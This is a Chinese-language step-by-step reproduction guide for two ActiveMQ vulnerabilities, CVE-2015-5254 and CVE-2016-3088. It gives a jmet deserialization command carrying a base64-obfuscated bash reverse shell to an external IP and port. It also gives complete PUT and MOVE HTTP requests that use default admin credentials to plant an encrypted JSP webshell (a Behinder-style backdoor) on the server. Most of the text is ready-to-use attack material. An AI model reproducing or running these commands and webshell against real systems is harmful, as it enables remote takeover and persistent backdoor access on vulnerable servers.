ActiveMQ

1.漏洞复现

CVE-2015-5254

影响范围：ActiveMQ 5.<13

https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

jmet-0.1.0-all.jar同文件夹下创建一个external文件夹

在ActiveMQ创建event队列

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME IP 61616

登录后台，路径：http://IP:8161/admin/browse.jsp?JMSDestination=event

查看版本的路径：http://IP:8161/admin/index.jsp?printable=true

先用NC监听，点击相应Message ID反弹shell

CVE-2016-3088

影响范围：ActiveMQ 5.<14

登录后台，路径：http://IP:8161/admin/browse.jsp?JMSDestination=event

查看版本的路径：http://IP:8161/admin/index.jsp?printable=true

查看 activemq.home 绝对路径(/opt/activemq)，路径：http://IP:8161/admin/test/systemProperties.jsp

PUT请求上传JSP一句话木马TXT

PUT /fileserver/shell.txt HTTP/1.1
Host: 192.168.135.131:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1k1v0vit2ubzudi6dbc7m4htj
Connection: close
Content-Length: 592

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

MOVE请求更改一句话木马路径

MOVE /fileserver/shell.txt HTTP/1.1
Destination:file:///opt/activemq/webapps/api/shell.jsp
Host: 192.168.135.131:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1k1v0vit2ubzudi6dbc7m4htj
Connection: close
Content-Length: 592

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

访问一句话木马，路径：/api/shell.jsp